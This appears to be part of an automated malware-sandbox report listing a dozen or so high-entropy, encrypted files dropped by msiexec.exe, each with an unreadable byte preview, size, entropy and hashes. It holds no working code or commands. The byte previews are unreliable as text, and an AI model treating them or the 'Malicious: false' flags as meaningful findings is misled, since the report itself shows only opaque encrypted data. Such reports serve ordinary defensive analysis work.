                                                  Preview:.jgeD..~.......!>I..u...,.y....D.;...m..}...=.*...u..Z...S.V..w.......7.:..DLy.8N....q.........g.S{........U.]X,.6#/V..[...A...f6..X..._..5..LX..._P*.KF...S9d7......].....l.....M.N...h.7...X.0.\..Kh.:.?...o8e.$.f...DQ..x.."f8.k{.n.^...'.Bo..), ..5.O....v.83........[|/..}...w]...B..l+......h..=..1s>.GA...V.{aBy.xS.y....@..2{..,...`....h.......w..}`z.X#.q..Jn.Y$3..]4.!..7.b.>.Exv..o.d.^..#.k..`..}.#u.'.tR..w.U&%k.?.w2't.(....u0.H.......y9....7.. `.4.7.E#....,-dmg.:..3....Or...+..G..sxqa...zqf_}[^.)..).d.,FL.q#.^....k.'...nZ. .)|?x......#....[.p.;......rwR..3.......T].../../u.....j7..U........c;D[Zh.I..Wa..<..B.....$..b...0......6.Z...7.....ma.]..Wl...k...2.v.......IH_.|=.lB"3......."M..zMB.Z....yP...}3z-\j..........U........1.\.J.&....$..(U.j).&Y.N..?....*.=..3Y..~...g..[.6.$.[.*....|....l6.I\..s...f..$.Z..km4v,}...u{.. ."......r.k....W.%N....M.q.....?..p...&...\.......a.....=-.T.*.C...3.5.:..$.jT.`.xS........kC`.2e.X.u....X......0.
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):98741
                                                  Entropy (8bit):7.998243054332217
                                                  Encrypted:true
                                                  SSDEEP:1536:oX3fRSJ+xEsiYjMjkiv2/ancWq6xFHQByrkFbMG+XUDwer4BQmxmFRq+aR:oXvx8Yjniv2/MqS7oFwGbDw/Bz
                                                  MD5:79958A2AA153BE7B553CC2D96CD06D04
                                                  SHA1:9EFF9E58E82B0DFE8E20807539A42D8170D92FDD
                                                  SHA-256:D687198F3020867A65A145C59C529A75C00D8DABBC77E1CD5F97A43CD04CC0D1
                                                  SHA-512:6F91D5B8226F8EB575BE2A0D6054F1EFC82A96D33F39F2A5EC192AB01D6431B706F4DAEF19003CDA8D2E43C2BC185A33A72AB10F944C223BC380AC6FDAF84949
                                                  Malicious:false
                                                  Preview:..C.+]"1......s..U^.<,N6)...w....Q..Z~..A.6.G...Z.....Z.V...?...@U\.5w.....(..y...w.y.x..l....I1...G......S..=..\.{s...3A....:...S...et.....)...).G.x..@.t.h..."...v+....P^Z..c4%R....P..O....)<.+.~.@)b.1...c.....LL."C..'....nB...o.O2....2.G.-O>(^...j.*.F......\"e.$^y6o.D...d...X.......~d..l.B.......K.n....VC..8.M.Xd..T<T...X%.....-E.6..}>.R..+`.........J.]....7b.^..L.(...w..u.J..'&8.Uc.v}..[g..Zy)^..j.+..G.PY.S.$..T\[l.E.u.O...E......*.te.x....r.....La....G..F..h..?.}.....*.W..2..L.\+W..<.^4bm..E..W..+......}...E.....7./k..`....u..F..E..].(.3..<D..$....A.......wQ<...`wP.l..J...H9.......{....Ob}....).......f...6...["S....+..UNU1.6..".*p.1.Q.\.X....~I.uK.........r...Q.T.........".....J.>.Y!..8.....dT""..D.%d....w_.=(*s._.@..*..w.u.7....6...f..;...T......h5g.)!...r.c<.t.......B...]..0....t..4.]..o.cuH......X......Yx=P..,=.yF."(c..n...1!..qJ..K....:;"..3p.-N....].d..........nf!.u...C..G..7.iu...I..\.....K.i.q.....OW.....Y56;E.s7..6*..1.Rg.......*V.@....
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):78862
                                                  Entropy (8bit):7.997909594863668
                                                  Encrypted:true
                                                  SSDEEP:1536:DbRSOeN5aKCd6OCQMPsjWsUtxfKxunGrYN2LZH/8yI3P6ek4xhviUf:vAOeN5aKCIOfHjWsSSxuGUNW/03K4xhp
                                                  MD5:848E786A4E27DE29734B05E8AE9F8F43
                                                  SHA1:AB96918CBCFFE7AC2CB56B394B6C4335D615310B
                                                  SHA-256:50E5697EDD5442A9C525183CA029F1AF0ACF5DA8ACE34EB94E1F249E931E0399
                                                  SHA-512:D0BB25FA9F9622E263D74CCBA895B9942A5B795F941F7A566C27A7324964CFDB41D381BB86C67E2191942EA5434E666C556CFB4CF534652918A51290D5E19E78
                                                  Malicious:false
                                                  Preview:i..|.W2#.....1...L.ut.....O.]..L5......L...y....N.Ci'...6.....f...%.Y{..F....]...-1.dwd.R..N..........0..ii.W_R..`..v=ML..e.....D...%Fn...*.zF}..N...z..].I..I."..`...s..[...F.._Z....O...lA`.3.|...G..M.8.........`.R..7.tF.....u&K[&.[W.t..l..&..f.Hw.c.-..p.....{.d*..Q7(...-_.....h....m..7.#.I.r9.mJ...,.Q..... q9..$.29*g..(..F....pt:j......."<.r.j...+C.I..;.(..J|....}...)!..Ir."q..Ia..G+x.kY..qQEl...yW@M..q....r.y..,.u.H....j#.C...8C.....M..}...R..JQ=bf..?..X.._.A.Eg.2@Q,..eM.....d....~.q...."0....#.."..q.T..,...0#...dR9F..wE..=o".wJ..n..9.....C.J.U..G-B8.....c....$....E.O=N......c.u]!..C+SS.}/..h.A..*..W.8I.....=..@;.....y.t.......!....I.F....'.IT-$..s.q*e..tl.....`]T....f../L.Sk.;.U..*`.}......b|..}.X.h.R.^P..D}-..B2.L.......fV^...9..!9.x....bW..8..p.\...:.Fd53.&........z.....;!..Y9..`.}..In..4.$.H........u]...cx.a.........'.Qk}..f..3......9q..xT.^D....?.nEo..;.hD).jb5j.......]Yw+...!....T.t..&Z.s18.P@.c.....P..m|G.9.s.6.C.f.VJ.9
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):70735
                                                  Entropy (8bit):7.997547189908903
                                                  Encrypted:true
                                                  SSDEEP:1536:8IG9B9COoGYLSHsY+QOnHOWDtd1FAh7+Gh8nBkC8UPWtrE0/8IMD/gX:8b9B9Cx6sY+nnhDbvi7+GynKUP2E0/8A
                                                  MD5:8111587F6EEF94E20D82D1D47A75D2C0
                                                  SHA1:612AE912416FD2951C60F275B51E9659905F3631
                                                  SHA-256:EABBBDF537AD123B3B958D49CC36F4ACEB7E107BA15A0BA249117678C9172D5B
                                                  SHA-512:F1C14F9465E445D23CCA83B81EA454D6BD8DE0B0F63A148B3308EFA671776A769B5E6E20D59D94A93B632EF4EAD5AEF9A63DDA2FE4FD6F39D5E1C40E52024FC4
                                                  Malicious:false
                                                  Preview:v... .~..%...K/6.....j...c..f.!...;.!..zG...W....@...L#-..=i]r9.$.W."ZK2.,....5nnT......Yz...G.3.*...F=.v.4....:..T.....r....D....g:.U.9.k.._....N8....}..q..8.cX..&...3.V;....gx.k.$&}..<..T6...c.aO.).auJ..#B..... T..kv..+...7.&.Sby.*.[n..qS.[.]...Q.:.pn.\_o0..oX....8|...z.o&......W4x.....M.E|q.ey#w..P.jZ.2..y'.....m2..!.!..q(>^.@...6.Q.*..z... .o."..]J8_......u..7.....O.&.m.nEP5.....h.~...`.4.S..K. T../I&..Td.*5.".M%.k.rl.'.C...e.H...D.E..gy...'.....}n..).'.LsP....V.r...0.|...a..l2SC./}.?..J...^&F...\......M..9l...VG=....w.}e{. ...g..wu.=r.j..xh[.:U~|m.4.[..Qt....%.}.^.g..Q.m........e}S..nz`;u...~0g.m..k.$..C...|U..].'7.{...Y.~........3\...|......WP.c.0...-E8..>'.#..>...t.....4....Wz&..3.N.[.o.;.../}.9...t7>CY...q.s~.a=D.Z1.R..Uc..]\. ...>@..Tk.i.I)P...............]..V.....CF x 1X.C...l}...1.t.M.".L.....{.e...`..i.zJr[.q...U....v....j5..~F|.....3.:ND.F.,..d......~.+.w...a7.j..:./.. hb..k.[.7.b.f.({..o..mA%M?!..F..;.*P.S.pu..>...Qw}K...v9...I(.
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):78877
                                                  Entropy (8bit):7.997709985507824
                                                  Encrypted:true
                                                  SSDEEP:1536:iY4KGMa7JrAdhz3kb92cF7ASmDmF+dUc6o5FiVgSsTA1gHTucfLAjP1:iY4COlWhK2cF7Fzc6ClLAij0jP1
                                                  MD5:9E6D44AF2442BC09A2022E324A1D0771
                                                  SHA1:E83A1D96B00321391909D1BA40641CF37E969305
                                                  SHA-256:6A5450B25E4079698FD7B79530D97B9C07B92648B89AC3EBC5A4C4BA5A746469
                                                  SHA-512:6B40FD41D4661C57D95D7E715817F549E2F3C3636089BCBDD70D95C1D05FF121E00889FBEC8E3977B4B7EC3FF3DB51BF5B56B5F87A75425C33A8F08502961010
                                                  Malicious:false
                                                  Preview:......p...;...I.Q.+m.U..qG.......p..u..-%..qhy%..l.....(..~..>.N.../..:.s..\.WV.<..v9.....y.0..7.../..........)....>YeS0...a=....3......H...........y.dFa-..x....-..r.[.H..........V.VX..E..$.......Y).)^A...BR'....R.M..............iZ...,. ^+....._..C..P.mT.|...~^..v.n.8d.q..uY...{..FF..O.vC+.......8(.......D..%.......np<...s[....Q.&.;.u.PX.+.a..Rv..E..(.T......c...$...u ..hw:.1v.R....p~..R...f#E..Q.......c.w...+.VB.]hC.|A....U..I.E..`...jX.H7.$....<(NX..s."#9.S.zc.....v.g..}....Q&M9...U....R.p1..fw....4d....R_.x|.{..O....L9.l7........Di@.z.}..^........XY...`l9q..UI..:.pT.....q..@..3....T8.N.J...D..r....iT..xf.k.s.8.6...r...G.dq.R...[pg.J.p^......)..y7v{...f...Wo.?./...A..]..O../.....,...5.4>......Nj...b.G..B*.... i.}.....{4....@G.n.T..zk.S.).9....$....=.... ....@%........xG.m...J......k.....zv.|....k..=.4..v..L5<zT....\.'..;..R.I....n&.......X`...2}.i...P)......j...>...O...^...Z,..!R.GSd....bM.5\..fL`..7.........[xl..I;..f..u1..b%.\|Os....
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:OpenPGP Secret Key
                                                  Category:dropped
                                                  Size (bytes):61544
                                                  Entropy (8bit):7.997153408462792
                                                  Encrypted:true
                                                  SSDEEP:1536:HvZHrrQ8N31kOajJXni8rr9QMd8acnTQO2B+eFcD2UbXnGy1W2k:NsWkOajs8neMd8vQl0bXnX8H
                                                  MD5:3650FB76AE4CFF4726E8872B93E2C12C
                                                  SHA1:A3A65CC647B6AACE541A8EE594A448630970C8DA
                                                  SHA-256:206071ECD6E7E8EE9D1EF4AD076A7CC494EA9B3ADD7A19F7722AF5552FCBB8C6
                                                  SHA-512:9FB164BC611053DEA149D80AC650540440B7BC96E089B097CC01E9CA4F5A63C28D7D795A1305BB0CDBFA3720C446FA4F2B8AAB5296D2B1A14CD9FC8B9F3DDD42
                                                  Malicious:false
                                                  Preview:.\sX.].i.<.w..s..m"O$=.]......!...~..T-8..0.%..I....&...*.....R<.........h@u..+8..?..W..Z(.zx=X...j\(.pn.0..M._x...M`.g..JN.d)..p......fn......+...9-P.....5.6C9....e....6....$.......P.z....r..E...W4....+.N;....f......._f..r|l1;.+.%..".s.....H..N.|.a..&.4=......V.I...`ZP.Se.....(..z......z ...t..~;.>Y...X..J....Lo;..^.*.t../[q.P....Q7....~....Z..1.k../....T*.....lt.A=$@.@#D...z[.....9.y..h........I....#*.....M@..x..1..y+f...47^......|7.D...G..b.A1<.c3Q+l.no5_1}q._.!...H...o.(....:.:P.V..s.W.Md\.B.j...?....9..`=.......j9/.....D.G]..^5.,.......P&..iQS_|.v..1}.:H.ry......3.........+.....h.Y..../..t~..m..!.`}.........@.F... ......L..M.z.?.z...mld.&......+7...u..cB...I@R...... .Q..!..Yd=..R.[.C..H...<..,...d..).1..O...^..]+.H.:u.(..7.z....N.l.X....b......%..#X[9.^....{..[.....,.....8.......v.u.FuT...D)c...W.s..d........Ri|O.....)[K..........H?.....p/r.w.@..H.K.8.h.........v.........(.Y....L...vo.{........@...=6.)..].R......tr.........Z
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):70903
                                                  Entropy (8bit):7.997762273448134
                                                  Encrypted:true
                                                  SSDEEP:1536:FoW7zuh08nXqwxjbFHE/R8BxRKYTp1+pK5K:qySh0yXqqRku3RmK5K
                                                  MD5:3ADA0033CB145EA5F21FA500D7C0892E
                                                  SHA1:4F708D1E86AD0E17724120C2173E63CA116E0F08
                                                  SHA-256:837B9E02155A6E0050D32A7CFEA718A0EFAC9BE1438AE27963EED22FB73020C5
                                                  SHA-512:72739AD51B300C0C79464211A967168291CA802A46697C64EC87DC2A4955935D9D513CFC6A2D2C861FE09A761D14282E05746639A777A7682ED5552167B9222E
                                                  Malicious:false
                                                  Preview:..X......8....y.!.j......h...m..u......;K.<..<P...+..F..`....pt.q.JP}....j.:. ..*....E7.!...{.W;W.T.:'.;....c.]U[J.&..b...n5.E..g....1....0.....+...n.,..l..4...r].>.uWR....T.,............v.m.GB.+hY0&tEHG.w.....+++z.8.....m+B#.pk.U..."..$..3.1. ..*.....4....8,.>.$OJ>....'DoL......v..>..w...j..o1..d. ;.8.m..;k.5...J.qLH...5.)...DF).....~......r..}G..5%..........q9...@,..|..m.t1.p...`cu..#t.#.x.XE.N&..aF..X.....?...@.G.t.....<.n>1.**X.KA.....-...).y..r+...D.G...U.1...C.I..[.[.Q..[.O.,.M.3.....:.....K;>.?..s.~......O.S.v..?c...ef....,....@*..*......r.M...:.0....b.ut....P.4j..&.D..dg}..Bb.&..tA..ip.:.VM6~..`'\.#....O.U.nm...p...c[h.).6..g.i............[...T..J|.D...f.....$....."wrd...C.mB....#|.l..B.Z..-pU..2C...#.1P.K..yOC..ms{^.m0..`x..W.....r..|.g..;........*M|}O../[...H~jT..M0Mpc.LY.N.].....0.....Q..2..#6./........I=.0C..h...]....<.+...W.CB.....X.........^...|........V....."..xd.......s.>K.{.........U...by.O.W;...2Z....w2....'..\9.`...].4..y.....0.
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):22448
                                                  Entropy (8bit):7.990462302661758
                                                  Encrypted:true
                                                  SSDEEP:384:Ioyf2fiZMsYRaMYfHXMMqASpqDHUY8XXOh9hN5cHW9YsJVS4LZg7KcTz:Ioyf2fidfHXMM5FD0Y4929zVSSZfc/
                                                  MD5:9FEDAB7983A94C2172ED0C8AD31A4AE0
                                                  SHA1:2344A10B0AC579D5F7C85B2F123568195CAA1129
                                                  SHA-256:03C0316AA06175D01772C590729B5861CCAA1E534C50A04C7749FB537FFB96F2
                                                  SHA-512:3EA7075DB556F51622029F655E13869A1E54619F1D5435C1A55A7EEE0E83EDA826A455026B1D138281697C27B02637CE2FD67F0B2E313ADEDDAD533B9DACA5D6
                                                  Malicious:false
                                                  Preview:.....$,.d........a_...Z*..j(...mq.D+ ..h..| ...a....v.......<...Y....7.T...R...?t..iaP.z|^o....sL..=.Q..j.....rC..$-.l.x..<+..R"....>W.}.....p........u..h}.$..f#..Hs....E..../.#`H.\.....T.J.h......t.5qg.8{.c..-.....\......}M.....R..m...V6e...D.T...?0/..n._.2......p3......c...|.5.G...ZV .*..?.ZT7.......w.k2.>.T`._...'7......G.3$....q......0..bnn.u'..rb...!...V........&..Jy.W.F9.j9......*.......\..k).s...o.......(S...L.K.]..XY..'........D....J./..o.eX..@..q#..2a....1.1.....K.....n/...8hYj...<..)...2o.s,3{.[...`$P.....b....Ar.....5......{.og=....$....q..<...#.K'2.\..r....W.^.F.zS-."."..S..TPO+.s4.....W...1u...E..]...#..R.,J...0.....|...SUE-}?m._../.r...H....I0...."0._n....{....!#..Q-.t...|..#.iv...@.-...........X.g.Y".x...J.-...b~.S....4f...`...t.2.5P.....)V..q..]0H.G`;.M.....7F...i..`...7.W$=...$.]wT.jx..~5.....?....f.O8.W....V..*.......1.C.3w,...t.K.y......Y......s...*.l....o. g...Z.eX.R...m.D...z.......Trj`.mZ...(...+i..g.v*..,...
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):31659
                                                  Entropy (8bit):7.99399133173195
                                                  Encrypted:true
                                                  SSDEEP:768:SAbxvE64by57PDhD86oYVMkPRDUGkMYoAMp+V/zJ:SAbxvEjiHtdoYzRDUGkgAMUV
                                                  MD5:5993A66FEC20A7F56E0F96BA6D4E1C3B
                                                  SHA1:272995381A0540C694D74CB8EBAE95409D69884C
                                                  SHA-256:8E16FDEB09B4ECC90704391DF62ED848A7B50395DD566F1B52C8EFDE7CDA8398
                                                  SHA-512:E9868C86C679E38AA938CDB9EE2E9FF336F7FAF8FF6EEFD0FB1590EEA27C8D60C575BD2575992570C811E8E1D1201F44DDE6D0BD2D02952BA7EBBEF0AE4648FD
                                                  Malicious:false
                                                  Preview:.......D.8ou..=@f..h..3..).}.L.gq....N.....o.`]v.r1.RV..M..-P.B.5....CV.../....-....i.6..s.*f0...........l"v>J...[....E.A...uC..Os............6.>......o92.u........n.l.-5..8..IO.}.<.><1....7..c...:..m.V?E?Kkkl..`@.G.=E.....t..K.$...Rc...c....:..w~...:.Yf.l..?Y....B.....D..s..|.n....b...*....@4.1."./.).......D...:..&.w...>n...=v....G..^(.\Xa.u.i.x../1....0p........c./T._h..,.@%.&....M..z..D.....c....1..*bL.A?%[..o..z^o..R..p..G.A3V..|f.5.....G..WXa...h_I...^......... ...N}X9v..HX.!w.~...r..?...\+..Qz2O,.t.H.h.9B.oF..(....?...jt.....-.c.,..a4....;.k..K..+S..Q..uD1....}w.l.............7..%..RY*.~N.....1.<..s..%c.8._u.u]1#'.G.-.... ..#.....H.n=;/.q.... +.?8E),1"C....B...../.r.VX......E.3.]e;.y.Z%w.I.m......Z7YV.l..@'.6.c8S.f.T...s......h...M."......W...-..,|<i...W.(...L.t<.G..&-.....h..a........&Ar....r....O....%T....`.b[J..,$...U.<...^QYSd......+.d..P...^.....M1.F....,....U..;..(e.C.`...m.....*..c..i..F-.^f.x.s.q..*...4..l..b.5..(...W.u(tu
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64474
                                                  Entropy (8bit):7.997138619206409
                                                  Encrypted:true
                                                  SSDEEP:1536:DVV4ccfHGh0qSMA2PHDOK5iP8LDU8czc6k7fo:DD4cJH5iE88c9kLo
                                                  MD5:DDF2883051F47CE475DAE1AFB23F7ABF
                                                  SHA1:476243F58CA6B87B3282455801ACA0259AC6C723
                                                  SHA-256:D7D2F9ACBAE11A604CD22795D5E8337512CB32577A86BA2917B8AB6388F0E052
                                                  SHA-512:BBBB7B15EDAF56059A757020F71A3939911F049AD516D9D70E37F2EEA961D6E2267B15EA87DC87C12F45ECBCE6F01DA5BD639C3ADB4B38A0A1656227D4325574
                                                  Malicious:false
                                                  Preview:..gD..3.............o.E.....m..r!./#........YR..;7...im..zeN...1.C...B...\.b.......{..%'.!.g..(EL..6..tewH@..{.b"...~..y..........+C..'h.>6..S..."w....#.E_?..Z..S{...X....g..8|..r..U.$..yy.......=.Z5..q....C'l...ub.=\d....;....x....i..~..Kgu.-.T..gs.m...$..#."0...j....N..j...Y..@.(o..I.>...8E./.y.Bs:-.mA....?......}....96..6.Y.._...K.Yl............h.O.i.V.k.Xh...I..L.......=I..qB..Wo.x....O..........t1.K,....n.?G.:......(.._.....+M...`.. .n...*....p}...X...<.....G......nK}....TR...l..C.P...M...n.[4.T"...............Gt.....!M....W5Z.k.......\.7..%AX.8./S.&....>.>.2.......yw.&...B.+.$.....)..?.E#....Ay2....v.j.:.y.T...5.....[.i..G1.....N.."....V..`k@.'(L...V..B.!.RF..O%\E....... *#B.....5..h..j....j.G.Ak.k.G..@.1>........>[.:.b'..........t*\.u.. .....R.L.....X..!......%...%.R..DN....4.....E.9....5....Fw.$.$;.."s$?.T.*..C=...:.sLv.>1.....(tUR...>.8........%.4b.U.....x.X.}.^.l$....A. .n9n..Dy...... ...b.8z.....jO...X.1...I...;..ek....2.IU<*8.w...
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):51995
                                                  Entropy (8bit):7.996670553920514
                                                  Encrypted:true
                                                  SSDEEP:768:SB6bvf3r/Vj8XCYh+6mVu53kdL0IOV7+izG725zUc/VEcbddzACmfKG5Fdt28/b4:SEbvj6XC2RkdLEVvG72Z95Jx1oRt28z4
                                                  MD5:D9C58337948C75B813FD2D5E82A97AA4
                                                  SHA1:49F09C4ABA76893A1768FEA3C2A8D1B9824FB363
                                                  SHA-256:77CF46704A7FDA09D1E918E48D3D53EB6AE7FDFBA930888393D89FB3A828B129
                                                  SHA-512:0C954FC759A9A1D4EF86B02533378359640888DDBEE6A0A35F1E9E120CF9BB62E5DE18E876E7F9353FE140727472599BD5B89D29CD86DF8041E1F48B87EB6152
                                                  Malicious:false
                                                  Preview:.S.`...Z.2.A1l....|.....QOr?......J.......1r...['.@..tI.U'(...$...y...CJ...9_.Q3k.......-./eV.d.g..\y....d.da~U-[.w)3...l...S....Sv......QU....8.a...#..^V..b..}....$D......U.p..F..^.....%..EO.....~..m'.W.{aj....' .5.C........O.G.0,."2...m.tR.)....W...#.....c.SX..v...tb.....#.q......-.....u.........tX1H@.Ee.vX.......e....O.4<..?{>.t.9.....\.......M..h...........r.....v.z_..9G.= ..'%...3/6..4.....Ts>M...\.....*......h...W_........A...y...4......K..bK..../......O......^sf]....]..:.{.;..q...M..;F,...]w.,....'...\..........>_n.4.....U09 \R.............@...T...'.j....x5....3gCa.......+.].az.*cWW....{ =.i+.@..FTu...{....y.a'c={..<.s...2...q..lKu`7.j...Q....+.%.J...._=....|]....-.,.*y>>.'.'..|.'.6w.C.U.z....V.j...,Sj.7!?6.y.S.i.9..O..i...8....LS...=U=....gf.....5.4.K!....8f.i.2.Aq...R..M...h....|..o......5..S......2..f...^._.. ..w...Y.T..u...|0o.~.......T|J'...^.9f ...8..<...!v.y.S.....TR0l.`..q...JV...3.....]......dFF]q.Z.~.#x...=..@k...2
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):31415
                                                  Entropy (8bit):7.994143485365186
                                                  Encrypted:true
                                                  SSDEEP:384:3aVW6crT4edytR/uxt3YT/hGkSAakRI/CzGGra+/8xgXBTCR+3tG6uVztEwzi6SL:3jAtR/sOaRISiAkBeR+SV5mfWuGZiBl9
                                                  MD5:0A2118A4283B99B879E8F73A8694F099
                                                  SHA1:A0E8FB80D27F1BF1B4C2873A3FC54523087696BF
                                                  SHA-256:D7C32146124A7A47F00FDED62330CC22DC444282A3EBAF3CF2D2D9E0878DB6AF
                                                  SHA-512:DFF1A29AB778540DA045280F6071C033D2CA48AE807084980A619CC369CC749C9323A8AC661BFCBE23E4C3F0ACF2F4CF29A57F816345AB398DA256C4465180CE
                                                  Malicious:false
                                                  Preview:a.c.>....2.GH....;_...=XL.._..Ys.....+z......._+q.../k...6.9...d.FL.e.a..<.p.%....*..8..../-.M.(.....Z....S.w..NJ.z.UV.@S...;.J...,..3|......JCwk.....{.....V>N....z.I....n.H..&.L......(...gH.$.H..............>......z..E....j}.....g...`s..U..H...Jh..3...H.......A_..Rf.h_zf...;v.....29i(.W}.......|......{...TTWb.....:..[..v:A./b~.Z6....)....=...+..A...&.'.*...l9K<......9S+._.9.....+?]....b1./N.2.....U.yg.\.X.R.{R}.7H.....\.......Eg.zN.d..rR..[.h,..S..2..,.K.<.J.(P%n..X..H.+VA/>M.@X..V.n.3..k....H%...&.h..U=.Fro9D.....I.z. >..F....^.A..C....3b.k.5.u......A.L...A....?2.iT.8|.Y...>...6..~.J`.O5`T...s......B...v4......./A.........h.o.s.M~[.].,L..$*...e$}...e.$..{b~.%xx..ex....|...t..a.f........e.h.....Zl.....;..e..6Fd..(..a.._Ku.A....z##V..~.-.pn......P..?.....O................U..j:PC.o...dZ.....hp^..4"y..M1..B..-N.vs..p...V.'{;(.\..vL3..h.....\;....Y......WC.._..s...S..$..+..'..k..r.8w......4).<k.;vX.........B..u.......MeH'.....6\S.L..;{.....
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):99465
                                                  Entropy (8bit):7.997818312765196
                                                  Encrypted:true
                                                  SSDEEP:3072:HP8joB8XiAYDPBF36R/9QQH/JtitZP+Cq4h1tRk:qiAYzBF36JlfJtidq2O
                                                  MD5:095AE6EA21AE2A12BCD1A2359C3D78F1
                                                  SHA1:143DA0B8E4BDB4377381A141FE4720FDE7D81B3B
                                                  SHA-256:FC38B2DC72B0EE8181827210581CC4A560AE4A984CAFB91910EE80658841B0E0
                                                  SHA-512:8C033C5D637EF289DBF28CFAC97DB9961ABEA6469054BC0A2864DE4FFC68765C801ED678CB3A955FD6313AA185FC98FB52BF41D62B10605B2EE2079130467DD2
                                                  Malicious:false
                                                  Preview:.6. ?.!...........a_;.[.,.dc.......*j...xc..}...(.....5..b...F.v.He..]...".>;.'...N'R...x..L.T..QTr..G.Z....~.%M.....`...t.......E......u....QR.l...mU.H.z..p.a.j]uH.z...o.D...k=...$J.i....O.1..x..n:4RFiqg..q........P.Q...N...k.<.......K.....v......N.h8.@I....#{.r..Y.'..v..[..u...G..v!.....Ss/...;.zj..p...k..y...>...~.2.W...bT.#.......;.ao8L........?..-........r-.=....J..`..^|..o.R..=.m.5.j...D..>'.a...W....$+m...P..`.^....U.d.....UP.\S| ..IV..u..Gl.eUz.q.....I.zT$.i.\&...r...?.F.jp.x.T9%%4pG#...c...3?y..rD...w........:5..2...Q.u+...N...'ad."..!.85../...N..:.u...i@oI.Y..>.."j"G.YZ.^...g.$.....V%y.^...{......i...... ..l(......T+.~b.v..+.S.4.Ia.~.....e.c2`.......#........G...*..6.5.SF.....p:...z3\&....^....O;.VN.Kf.......m....t.![S^.......&...I.....1.L..E..\o.$.Q...:...>.o.........dG..gb,2.........9..Wbk.}z.7.......T=...Q...B..4...uE.4@eN.../..B.....:....M_......uAFn..b. S.".+.....]..>X<.{.R.@...i..it..K.`..T1..,..%j.\..K...w..`. J...b.g......U.3.<2..V.Y.
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32176
                                                  Entropy (8bit):7.9940586558098286
                                                  Encrypted:true
                                                  SSDEEP:768:7+HfVBVBOdmCIjLCwFT5pASdUSD1u/shaNOwPgMaaAP5hjMkXdRo:q//OdpIXCwF9WSaSDA0hg4qA3RdC
                                                  MD5:6118044F9E275C917582D65947E8DE41
                                                  SHA1:6C9C21D007F856100C8B81D7ABA6AE2B48C85DFB
                                                  SHA-256:E5890EB60C87A566000D78B637DF2812C3169B9E1A8711450A4FBA6A7062299C
                                                  SHA-512:709FE85D777CD5E8172C63632D19E033739DE1380AAD8FB3151300CA5E0450D8BA5A5DA899D7AD6622DBBBDB9BEAD0AC850275A2F833C98CE24429AED2FD2331
                                                  Malicious:false
                                                  Preview:wr.MK.U.}.[....=q.....^..f...[..hVc......v...t=U?DQ..3.8k..g9.D.F1.w..i..2.L...d..8)...F...5.......&;...9.l.....9...s.X7..{h/.U...\...&.....O...Th.t....N..(.....8i,z.kdS..>.G....1.q...kV....#.....nY. J..S.}`..gb.i..w.U./ *.W.x..|...(..._{...LdS+y;.....o>..`.....*Q|3.UD..:F.9.yG"_...N/~.?.......k.16.j.q..6..C9..rD.lA..=.|t.0b..i9'...q..nE.na.S..b...3^DAS..+....<..Y2.........c+.#,....b..q?.6m.\.h}*C.'..c....U.._B.^-I...9a...+.&..~..*../.@.S..X...@.!.B~.JL.a.;..ev3(.....p..s$...W......pxj.....~.4..,.x..e..!... ..z..$X...SL..O8x.?.x..#A...S.....f{u............)-..Q....,.F..H_p.......K....9.....~Wy.I.H.D.e.rr.p....X.|.z+.(...{.P..A.=......j_l..Zj...'/.....5.5f......e..}....im.X(.,.:.t..M..b.ZW..K...o..P........&..3....yHf.CS.j..8..J<g..@m[XYo......[.o..hJ"...w5..:...X.[...;.p*.B_....8...U.{..,F..>..rs..LsV.lk.gOE...M.?@@..C...&..k....]8.....g...1r_.&.....B......l.t..R.=.....5.G....[...M._.\d.......$.T$..)..q.G.I...6S......HX....P....Z.F=..i."
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):91594
                                                  Entropy (8bit):7.997720136221587
                                                  Encrypted:true
                                                  SSDEEP:1536:f9waA66hrRRXi6BMhXBQHKmlAwFkBNHx2Vb8j9od+DawyYVVyrx8xLYL:feVlXiqKAbF+B1Mb8jWd+NyOkVL
                                                  MD5:0782126BBC13E20E6B8E8F32D932329D
                                                  SHA1:393DE5EB74893A30FA81D417B1B70A9A639B86C9
                                                  SHA-256:D3ADBCB5CC190C7E0C592F8568EE47442D84301E6F6A707E2D133D147C5F8546
                                                  SHA-512:8CE5ED361DAD8C8FFFADE4E5490471AFBE2BB4359E137B7396FFC7E8633FAB4E05709A804BDAD9C6E1B120EB079DEFB0C1C4C44859FC28F36BE3AECE007BED21
                                                  Malicious:false
